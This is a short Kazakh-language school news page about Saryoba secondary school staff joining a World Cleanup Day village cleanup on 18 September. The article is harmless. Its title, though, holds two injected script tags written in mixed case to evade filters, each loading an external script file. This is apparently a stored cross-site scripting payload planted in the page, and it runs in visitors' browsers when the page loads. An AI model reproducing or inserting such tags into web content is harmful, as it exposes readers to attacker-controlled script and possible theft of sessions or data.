Экологиялық сенбілік<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.09.2021

18 қыркүйек күні «Дүниежүзілік тазалық күні» дәстүрлі ауқымды акциясына Сарыоба орта мектебінің ұжымы белсенді атсалысты. Сенбіліктің мақсаты- ауылымыздың шырайын әрлендірумен қатар үздік экологиялық таза аймаққа айналдыру.Сенбілікке қатысушылар қажетті мөлшерде құрал-саймандармен, қоқысты жинауға арналған қапшықтар және қолғаптармен келіп, аумақты жинап шықты.  Ауылдың  санитарлық жағдайын жақсарту үшін көріктендіру және  сырт көрінісіне де ерекше көңіл бөлу сияқты ауқымды жұмыстар жүргізілді. Шара көтеріңкі көңіл-күймен басталып, қатысушылар сенбіліктің маңыздылығын жақсы түсініп, белсенді жұмыс істеді.Ұжымдық шаралардың адамдарға үлкен әсер беріп, олардың бір-біріне деген сенімдерін ұштай түсері де анық.

Просмотров: 974


Пікір қосу



Деректерді қолтаңбаға қосу